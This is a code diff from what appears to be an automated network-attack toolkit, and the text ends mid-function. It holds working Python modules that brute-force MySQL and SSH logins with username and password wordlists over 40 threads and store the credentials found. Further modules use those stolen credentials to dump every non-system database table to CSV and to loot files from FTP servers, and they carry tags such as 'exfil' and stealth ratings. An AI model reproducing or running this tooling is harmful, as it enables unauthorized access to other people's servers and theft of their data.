def __init__(self, shared_data):
self.shared_data = shared_data
self.load_scan_file()
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.sqlfile = shared_data.sqlfile
if not os.path.exists(self.sqlfile):
with open(self.sqlfile, "w") as f:
f.write("IP Address,User,Password,Port,Database\n")
self.results = []
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the scan file and filter it for SQL ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("3306", na=False)]
def sql_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an SQL service using the given credentials without specifying a database.
"""
try:
# Première tentative sans spécifier de base de données
conn = pymysql.connect(
host=adresse_ip,
user=user,
password=password,
port=3306
)
# Si la connexion réussit, récupérer la liste des bases de données
with conn.cursor() as cursor:
cursor.execute("SHOW DATABASES")
databases = [db[0] for db in cursor.fetchall()]
conn.close()
logger.info(f"Successfully connected to {adresse_ip} with user {user}")
logger.info(f"Available databases: {', '.join(databases)}")
# Sauvegarder les informations avec la liste des bases trouvées
return True, databases
except pymysql.Error as e:
logger.error(f"Failed to connect to {adresse_ip} with user {user}: {e}")
return False, []
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, port = self.queue.get()
success, databases = self.sql_connect(adresse_ip, user, password)
if success:
with self.lock:
# Ajouter une entrée pour chaque base de données trouvée
for db in databases:
self.results.append([adresse_ip, user, password, port, db])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user} | Password: {password}")
logger.success(f"Databases found: {', '.join(databases)}")
self.save_results()
self.remove_duplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file()
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing SQL...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
logger.info(f"Bruteforcing complete with success status: {success_flag[0]}")
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['IP Address', 'User', 'Password', 'Port', 'Database'])
df.to_csv(self.sqlfile, index=False, mode='a', header=not os.path.exists(self.sqlfile))
logger.info(f"Saved results to {self.sqlfile}")
self.results = []
def remove_duplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.sqlfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.sqlfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
sql_bruteforce = SQLBruteforce(shared_data)
logger.info("[bold green]Starting SQL brute force attack on port 3306[/bold green]")
# Load the IPs to scan from shared data
ips_to_scan = shared_data.read_data()
# Execute brute force attack on each IP
for row in ips_to_scan:
ip = row["IPs"]
sql_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total successful attempts: {len(sql_bruteforce.sql_connector.results)}")
exit(len(sql_bruteforce.sql_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

315
actions/ssh_bruteforce.py Normal file
View File

@@ -0,0 +1,315 @@
"""
ssh_bruteforce.py - This script performs a brute force attack on SSH services (port 22)
to find accessible accounts using various user credentials. It logs the results of
successful connections.
SQL version (minimal changes):
- Targets still provided by the orchestrator (ip + port)
- IP -> (MAC, hostname) mapping read from DB 'hosts'
- Successes saved into DB.creds (service='ssh') with robust fallback upsert
- Action status recorded in DB.action_results (via SSHBruteforce.execute)
- Paramiko noise silenced; ssh.connect avoids agent/keys to reduce hangs
"""
import os
import paramiko
import socket
import threading
import logging
import time
from datetime import datetime
from queue import Queue
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="ssh_bruteforce.py", level=logging.DEBUG)
# Silence Paramiko internals
for _name in ("paramiko", "paramiko.transport", "paramiko.client", "paramiko.hostkeys",
"paramiko.kex", "paramiko.auth_handler"):
logging.getLogger(_name).setLevel(logging.CRITICAL)
# Define the necessary global variables
b_class = "SSHBruteforce"
b_module = "ssh_bruteforce"
b_status = "brute_force_ssh"
b_port = 22
b_service = '["ssh"]'
b_trigger = 'on_any:["on_service:ssh","on_new_port:22"]'
b_parent = None
b_priority = 70
b_cooldown = 1800 # 30 minutes entre deux runs
b_rate_limit = '3/86400' # 3 fois par jour max
class SSHBruteforce:
"""Wrapper called by the orchestrator."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.ssh_bruteforce = SSHConnector(shared_data)
logger.info("SSHConnector initialized.")
def bruteforce_ssh(self, ip, port):
"""Run the SSH brute force attack on the given IP and port."""
logger.info(f"Running bruteforce_ssh on {ip}:{port}...")
return self.ssh_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Execute the brute force attack and update status (for UI badge)."""
logger.info(f"Executing SSHBruteforce on {ip}:{port}...")
self.shared_data.bjorn_orch_status = "SSHBruteforce"
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": port}
success, results = self.bruteforce_ssh(ip, port)
return 'success' if success else 'failed'
class SSHConnector:
"""Handles the connection attempts and DB persistence."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Load wordlists (unchanged behavior)
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
# Build initial IP -> (MAC, hostname) cache from DB
self._ip_to_identity = {}
self._refresh_ip_identity_cache()
self.lock = threading.Lock()
self.results = [] # List of tuples (mac, ip, hostname, user, password, port)
self.queue = Queue()
# ---- Mapping helpers (DB) ------------------------------------------------
def _refresh_ip_identity_cache(self):
"""Load IPs from DB and map them to (mac, current_hostname)."""
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str):
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str):
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# ---- File utils ----------------------------------------------------------
@staticmethod
def _read_lines(path: str):
try:
with open(path, "r", encoding="utf-8", errors="ignore") as f:
return [l.rstrip("\n\r") for l in f if l.strip()]
except Exception as e:
logger.error(f"Cannot read file {path}: {e}")
return []
# ---- SSH core ------------------------------------------------------------
def ssh_connect(self, adresse_ip, user, password, port=b_port, timeout=10):
"""Attempt to connect to SSH using (user, password)."""
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(
hostname=adresse_ip,
username=user,
password=password,
port=port,
timeout=timeout,
auth_timeout=timeout,
banner_timeout=timeout,
look_for_keys=False, # avoid slow key probing
allow_agent=False, # avoid SSH agent delays
)
return True
except (paramiko.AuthenticationException, socket.timeout, socket.error, paramiko.SSHException):
return False
except Exception as e:
logger.debug(f"SSH connect unexpected error {adresse_ip} {user}: {e}")
return False
finally:
try:
ssh.close()
except Exception:
pass
# ---- Robust DB upsert fallback ------------------------------------------
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
"""
Insert-or-update without relying on ON CONFLICT columns.
Works even if your UNIQUE index uses expressions (e.g., COALESCE()).
"""
mac_k = mac or ""
ip_k = ip or ""
user_k = user or ""
db_k = database or ""
port_k = int(port or 0)
try:
with self.shared_data.db.transaction(immediate=True):
# 1) Insert if missing
self.shared_data.db.execute(
"""
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES('ssh',?,?,?,?,?,?,?,NULL)
""",
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
)
# 2) Update password/hostname if present (or just inserted)
self.shared_data.db.execute(
"""
UPDATE creds
SET "password"=?,
hostname=COALESCE(?, hostname),
last_seen=CURRENT_TIMESTAMP
WHERE service='ssh'
AND COALESCE(mac_address,'')=?
AND COALESCE(ip,'')=?
AND COALESCE("user",'')=?
AND COALESCE(COALESCE("database",""),'')=?
AND COALESCE(port,0)=?
""",
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
)
except Exception as e:
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
# ---- Worker / Queue / Threads -------------------------------------------
def worker(self, success_flag):
"""Worker thread to process items in the queue (bruteforce attempts)."""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
try:
if self.ssh_connect(adresse_ip, user, password, port=port):
with self.lock:
# Persist success into DB.creds
try:
self.shared_data.db.insert_cred(
service="ssh",
mac=mac_address,
ip=adresse_ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=None,
extra=None
)
except Exception as e:
# Specific fix: fallback manual upsert
if "ON CONFLICT clause does not match" in str(e):
self._fallback_upsert_cred(
mac=mac_address,
ip=adresse_ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=None
)
else:
logger.error(f"insert_cred failed for {adresse_ip} {user}: {e}")
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}")
success_flag[0] = True
finally:
self.queue.task_done()
# Optional delay between attempts
if getattr(self.shared_data, "timewait_ssh", 0) > 0:
time.sleep(self.shared_data.timewait_ssh)
def run_bruteforce(self, adresse_ip, port):
"""
Called by the orchestrator with a single IP + port.
Builds the queue (users x passwords) and launches threads.
"""
mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or ""
total_tasks = len(self.users) * len(self.passwords)
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
thread_count = min(40, max(1, total_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
# clear queue
while not self.queue.empty():
try:
self.queue.get_nowait()
self.queue.task_done()
except Exception:
break
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if any
if __name__ == "__main__":
shared_data = SharedData()
try:
ssh_bruteforce = SSHBruteforce(shared_data)
logger.info("SSH brute force module ready.")
exit(0)
except Exception as e:
logger.error(f"Error: {e}")
exit(1)

View File

@@ -1,198 +0,0 @@
"""
ssh_connector.py - This script performs a brute force attack on SSH services (port 22) to find accessible accounts using various user credentials. It logs the results of successful connections.
"""
import os
import pandas as pd
import paramiko
import socket
import threading
import logging
from queue import Queue
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="ssh_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "SSHBruteforce"
b_module = "ssh_connector"
b_status = "brute_force_ssh"
b_port = 22
b_parent = None
class SSHBruteforce:
"""
Class to handle the SSH brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.ssh_connector = SSHConnector(shared_data)
logger.info("SSHConnector initialized.")
def bruteforce_ssh(self, ip, port):
"""
Run the SSH brute force attack on the given IP and port.
"""
logger.info(f"Running bruteforce_ssh on {ip}:{port}...")
return self.ssh_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
logger.info(f"Executing SSHBruteforce on {ip}:{port}...")
self.shared_data.bjornorch_status = "SSHBruteforce"
success, results = self.bruteforce_ssh(ip, port)
return 'success' if success else 'failed'
class SSHConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("22", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.sshfile = shared_data.sshfile
if not os.path.exists(self.sshfile):
logger.info(f"File {self.sshfile} does not exist. Creating...")
with open(self.sshfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for SSH ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("22", na=False)]
def ssh_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an SSH service using the given credentials.
"""
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(adresse_ip, username=user, password=password, banner_timeout=200) # Adjust timeout as necessary
return True
except (paramiko.AuthenticationException, socket.error, paramiko.SSHException):
return False
finally:
ssh.close() # Ensure the SSH connection is closed
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.ssh_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing SSH...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.sshfile, index=False, mode='a', header=not os.path.exists(self.sshfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.sshfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.sshfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
ssh_bruteforce = SSHBruteforce(shared_data)
logger.info("Démarrage de l'attaque SSH... sur le port 22")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute force on each IP
for row in ips_to_scan:
ip = row["IPs"]
logger.info(f"Executing SSHBruteforce on {ip}...")
ssh_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Nombre total de succès: {len(ssh_bruteforce.ssh_connector.results)}")
exit(len(ssh_bruteforce.ssh_connector.results))
except Exception as e:
logger.error(f"Erreur: {e}")

View File

@@ -1,189 +1,252 @@
"""
steal_data_sql.py — SQL data looter (DB-backed)
SQL mode:
- Orchestrator provides (ip, port) after parent success (SQLBruteforce).
- DB.creds (service='sql') provides (user,password, database?).
- We connect first without DB to enumerate tables (excluding system schemas),
then connect per schema to export CSVs.
- Output under: {data_stolen_dir}/sql/{mac}_{ip}/{schema}/{schema_table}.csv
"""
import os
import pandas as pd
import logging
import time
from sqlalchemy import create_engine
from rich.console import Console
import csv
from threading import Timer
from typing import List, Tuple, Dict, Optional
from sqlalchemy import create_engine, text
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_data_sql.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealDataSQL"
b_module = "steal_data_sql"
b_status = "steal_data_sql"
b_parent = "SQLBruteforce"
b_port = 3306
b_trigger = 'on_any:["on_cred_found:sql","on_service:sql"]'
b_requires = '{"all":[{"has_cred":"sql"},{"has_port":3306},{"max_concurrent":2}]}'
# Scheduling / limits
b_priority = 60 # 0..100 (higher processed first in this schema)
b_timeout = 900 # seconds before a pending queue item expires
b_max_retries = 1 # minimal retries; avoid noisy re-runs
b_cooldown = 86400 # seconds (per-host cooldown between runs)
b_rate_limit = "1/86400" # at most 3 executions/day per host (extra guard)
# Risk / hygiene
b_stealth_level = 6 # 1..10 (higher = more stealthy)
b_risk_level = "high" # 'low' | 'medium' | 'high'
b_enabled = 1 # set to 0 to disable from DB sync
# Tags (free taxonomy, JSON-ified by sync_actions)
b_tags = ["exfil", "sql", "loot", "db", "mysql"]
class StealDataSQL:
"""
Class to handle the process of stealing data from SQL servers.
"""
def __init__(self, shared_data):
try:
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.sql_connected = False
self.stop_execution = False
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
logger.info("StealDataSQL initialized.")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_sql(self, ip, username, password, database=None):
"""
Establish a MySQL connection using SQLAlchemy.
"""
# -------- Identity cache (hosts) --------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# -------- Credentials (creds table) --------
def _get_creds_for_target(self, ip: str, port: int) -> List[Tuple[str, str, Optional[str]]]:
"""
Return list[(user,password,database)] for SQL service.
Prefer exact IP; also include by MAC if known. Dedup by (u,p,db).
"""
mac = self.mac_for_ip(ip)
params = {"ip": ip, "port": port, "mac": mac or ""}
by_ip = self.shared_data.db.query(
"""
SELECT "user","password","database"
FROM creds
WHERE service='sql'
AND COALESCE(ip,'')=:ip
AND (port IS NULL OR port=:port)
""", params)
by_mac = []
if mac:
by_mac = self.shared_data.db.query(
"""
SELECT "user","password","database"
FROM creds
WHERE service='sql'
AND COALESCE(mac_address,'')=:mac
AND (port IS NULL OR port=:port)
""", params)
seen, out = set(), []
for row in (by_ip + by_mac):
u = str(row.get("user") or "").strip()
p = str(row.get("password") or "").strip()
d = row.get("database")
d = str(d).strip() if d is not None else None
key = (u, p, d or "")
if not u or (key in seen):
continue
seen.add(key)
out.append((u, p, d))
return out
# -------- SQL helpers --------
def connect_sql(self, ip: str, username: str, password: str, database: Optional[str] = None):
try:
# Si aucune base n'est spécifiée, on se connecte sans base
db_part = f"/{database}" if database else ""
connection_str = f"mysql+pymysql://{username}:{password}@{ip}:3306{db_part}"
engine = create_engine(connection_str, connect_args={"connect_timeout": 10})
conn_str = f"mysql+pymysql://{username}:{password}@{ip}:{b_port}{db_part}"
engine = create_engine(conn_str, connect_args={"connect_timeout": 10})
# quick test
with engine.connect() as _:
pass
self.sql_connected = True
logger.info(f"Connected to {ip} via SQL with username {username}" + (f" to database {database}" if database else ""))
logger.info(f"Connected SQL {ip} as {username}" + (f" db={database}" if database else ""))
return engine
except Exception as e:
logger.error(f"SQL connection error for {ip} with user '{username}' and password '{password}'" + (f" to database {database}" if database else "") + f": {e}")
logger.error(f"SQL connect error {ip} {username}" + (f" db={database}" if database else "") + f": {e}")
return None
def find_tables(self, engine):
"""
Find all tables in all databases, excluding system databases.
Returns list of (table_name, schema_name) excluding system schemas.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("Table search interrupted due to orchestrator exit.")
logger.info("Table search interrupted.")
return []
query = """
q = text("""
SELECT TABLE_NAME, TABLE_SCHEMA
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_SCHEMA NOT IN ('information_schema', 'mysql', 'performance_schema', 'sys')
AND TABLE_TYPE = 'BASE TABLE'
"""
df = pd.read_sql(query, engine)
tables = df[['TABLE_NAME', 'TABLE_SCHEMA']].values.tolist()
logger.info(f"Found {len(tables)} tables across all databases")
return tables
WHERE TABLE_TYPE='BASE TABLE'
AND TABLE_SCHEMA NOT IN ('information_schema','mysql','performance_schema','sys')
""")
with engine.connect() as conn:
rows = conn.execute(q).fetchall()
return [(r[0], r[1]) for r in rows]
except Exception as e:
logger.error(f"Error finding tables: {e}")
logger.error(f"find_tables error: {e}")
return []
def steal_data(self, engine, table, schema, local_dir):
"""
Download data from the table in the database to a local file.
"""
def steal_data(self, engine, table: str, schema: str, local_dir: str) -> None:
try:
if self.shared_data.orchestrator_should_exit:
logger.info("Data stealing process interrupted due to orchestrator exit.")
logger.info("Data steal interrupted.")
return
query = f"SELECT * FROM {schema}.{table}"
df = pd.read_sql(query, engine)
local_file_path = os.path.join(local_dir, f"{schema}_{table}.csv")
df.to_csv(local_file_path, index=False)
logger.success(f"Downloaded data from table {schema}.{table} to {local_file_path}")
q = text(f"SELECT * FROM `{schema}`.`{table}`")
with engine.connect() as conn:
result = conn.execute(q)
headers = result.keys()
os.makedirs(local_dir, exist_ok=True)
out = os.path.join(local_dir, f"{schema}_{table}.csv")
with open(out, "w", newline="", encoding="utf-8") as f:
writer = csv.writer(f)
writer.writerow(headers)
for row in result:
writer.writerow(row)
logger.success(f"Dumped {schema}.{table} -> {out}")
except Exception as e:
logger.error(f"Error downloading data from table {schema}.{table}: {e}")
logger.error(f"Dump error {schema}.{table}: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal data from the remote SQL server.
"""
# -------- Orchestrator entry --------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
try:
if 'success' in row.get(self.b_parent_action, ''):
self.shared_data.bjornorch_status = "StealDataSQL"
time.sleep(5)
logger.info(f"Stealing data from {ip}:{port}...")
self.shared_data.bjorn_orch_status = b_class
try:
port_i = int(port)
except Exception:
port_i = b_port
sqlfile = self.shared_data.sqlfile
credentials = []
if os.path.exists(sqlfile):
df = pd.read_csv(sqlfile)
# Filtrer les credentials pour l'IP spécifique
ip_credentials = df[df['IP Address'] == ip]
# Créer des tuples (username, password, database)
credentials = [(row['User'], row['Password'], row['Database'])
for _, row in ip_credentials.iterrows()]
logger.info(f"Found {len(credentials)} credential combinations for {ip}")
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
creds = self._get_creds_for_target(ip, port_i)
logger.info(f"Found {len(creds)} SQL credentials in DB for {ip}")
if not creds:
logger.error(f"No SQL credentials for {ip}. Skipping.")
return 'failed'
def timeout():
def _timeout():
if not self.sql_connected:
logger.error(f"No SQL connection established within 4 minutes for {ip}. Marking as failed.")
logger.error(f"No SQL connection within 4 minutes for {ip}. Failing.")
self.stop_execution = True
timer = Timer(240, timeout)
timer = Timer(240, _timeout)
timer.start()
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
success = False
for username, password, database in credentials:
for username, password, _db in creds:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Steal data execution interrupted.")
logger.info("Execution interrupted.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip} on database {database}")
# D'abord se connecter sans base pour vérifier les permissions globales
engine = self.connect_sql(ip, username, password)
if engine:
tables = self.find_tables(engine)
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"sql/{mac}_{ip}/{database}")
os.makedirs(local_dir, exist_ok=True)
base_engine = self.connect_sql(ip, username, password, database=None)
if not base_engine:
continue
tables = self.find_tables(base_engine)
if not tables:
continue
if tables:
for table, schema in tables:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
# Se connecter à la base spécifique pour le vol de données
db_engine = self.connect_sql(ip, username, password, schema)
if db_engine:
db_engine = self.connect_sql(ip, username, password, database=schema)
if not db_engine:
continue
local_dir = os.path.join(self.shared_data.data_stolen_dir, f"sql/{mac}_{ip}/{schema}")
self.steal_data(db_engine, table, schema, local_dir)
success = True
counttables = len(tables)
logger.success(f"Successfully stolen data from {counttables} tables on {ip}:{port}")
if success:
logger.success(f"Stole data from {len(tables)} tables on {ip}")
success = True
timer.cancel()
return 'success'
except Exception as e:
logger.error(f"Error stealing data from {ip} with user '{username}' on database {database}: {e}")
logger.error(f"SQL loot error {ip} {username}: {e}")
if not success:
logger.error(f"Failed to steal any data from {ip}:{port}")
return 'failed'
else:
return 'success'
else:
logger.info(f"Skipping {ip} as it was not successfully bruteforced")
return 'skipped'
timer.cancel()
return 'success' if success else 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
def b_parent_action(self, row):
"""
Get the parent action status from the row.
"""
return row.get(b_parent, {}).get(b_status, '')
if __name__ == "__main__":
shared_data = SharedData()
try:
steal_data_sql = StealDataSQL(shared_data)
logger.info("[bold green]Starting SQL data extraction process[/bold green]")
# Load the IPs to process from shared data
ips_to_process = shared_data.read_data()
# Execute data theft on each IP
for row in ips_to_process:
ip = row["IPs"]
steal_data_sql.execute(ip, b_port, row, b_status)
except Exception as e:
logger.error(f"Error in main execution: {e}")

View File

@@ -1,198 +1,248 @@
"""
steal_files_ftp.py - This script connects to FTP servers using provided credentials or anonymous access, searches for specific files, and downloads them to a local directory.
steal_files_ftp.py — FTP file looter (DB-backed)
SQL mode:
- Orchestrator provides (ip, port) after parent success (FTPBruteforce).
- FTP credentials are read from DB.creds (service='ftp'); anonymous is also tried.
- IP -> (MAC, hostname) via DB.hosts.
- Loot saved under: {data_stolen_dir}/ftp/{mac}_{ip}/(anonymous|<username>)/...
"""
import os
import logging
import time
from rich.console import Console
from threading import Timer
from typing import List, Tuple, Dict, Optional
from ftplib import FTP
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_ftp.py", level=logging.DEBUG)
# Define the necessary global variables
# Action descriptors
b_class = "StealFilesFTP"
b_module = "steal_files_ftp"
b_status = "steal_files_ftp"
b_parent = "FTPBruteforce"
b_port = 21
class StealFilesFTP:
"""
Class to handle the process of stealing files from FTP servers.
"""
def __init__(self, shared_data):
try:
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.ftp_connected = False
self.stop_execution = False
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
logger.info("StealFilesFTP initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_ftp(self, ip, username, password):
# -------- Identity cache (hosts) --------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
